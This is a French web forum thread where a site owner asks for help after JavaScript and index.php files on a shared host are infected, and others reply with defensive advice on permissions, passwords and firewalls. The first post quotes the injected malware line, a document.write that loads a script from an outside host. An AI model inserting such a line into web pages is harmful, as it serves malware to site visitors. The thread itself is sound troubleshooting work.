Discussion :

[Gaetan_]

Bonjour,

J'ai un de mes sites hébergé en mutualisé.
Cela fait la deuxième fois que des pages sont infectées par des malawares "mwjs-iframe-injected691?v27"

Known javascript malware. Details: http://labs.sucuri.net/db/malware/mw...njected691?v27
document.write('<script type="text/javascript" src="http://mebelpodzakaz.net.ua/gallery/test/3d6zpkfz.php?id=2828159"></script>');

Les scripts infectés sont les scripts JS et les index.php

Je ne sais que faire, j'avais modifié mes CHMod de scripts JS en 555, etc... je modifie mes codes FTP.

Pouvez vous me donner quelques conseils pour éviter que cela se reproduise ?

Merci à vous.

[Muchos]

Bonjour,

Le piratage d'un site est un sujet malheureusement courant. N'hésitez pas à faire une recherche sur Developpez.

Faites aussi une recherche en ligne avec le nom du malware. Sucuri signale ainsi que ce malware :

utilise javascript pour générer dynamiquement une iframe dans le navigateur de votre visiteur. Il est souvent présent sur des sites Joomla et WordPress non mis à jour.

Plus généralement, il faut se demander d'où vient/viennent la vulnérabilité :

• de votre PC (infection) ?
• de votre hébergeur (parlez-en avec lui) ?
• de votre CMS ou d'un plug-in?
• d'un fichier intrus ou corrompu dans le répertoire de votre site (vérifiez les logs de votre serveur ou demandez-les à l'hébergeur) ?
• d'un problème d'intégration (ex: formulaire mal sécurisé) ?

Dans tous les cas, changer tous vos mots de passe avec si possible des mots de passe plus forts.

j'avais modifié mes CHMod de scripts JS en 555

Je suis aussi sur un mutualisé, et il me semble que le CHMOD doit être fixé pour tous les fichiers à 750 (aucun droit pour le groupe Autres).

[Gaetan_]

Pardon pour ce retard.
Merci pour ta réponse.

[cavo789]

Bonsoir

Il y a un très grand nombre de protections à prendre dont celle (pas l'unique) d'installer un parefeu logiciel. Il vous faut un logiciel qui filtre les URLs qui arrivent sur votre site afin de voir celles qui sont potentiellement dangeureuses afin de les bloquer.

Le parefeu va aussi bloquer l'exécution de scripts malsains dans des dossiers où de tels scripts n'ont que faire; un exemple : le dossier images.

Il faut aussi que vos chmods soient, sur un site dynamique, sur 644 pour les fichiers et 755 pour les dossiers.

Pour info, voici un article que j'ai rédigé en Septembre pour le magazine Joomla. Il s'applique à Joomla mais il reprend un grand nombre de "recettes" applicables partout ailleurs : http://magazine.joomla.org/internati...re-site-joomla (Et si on se penchait sur la sécurité de votre site Joomla!)

Bonne soirée et bonne protection.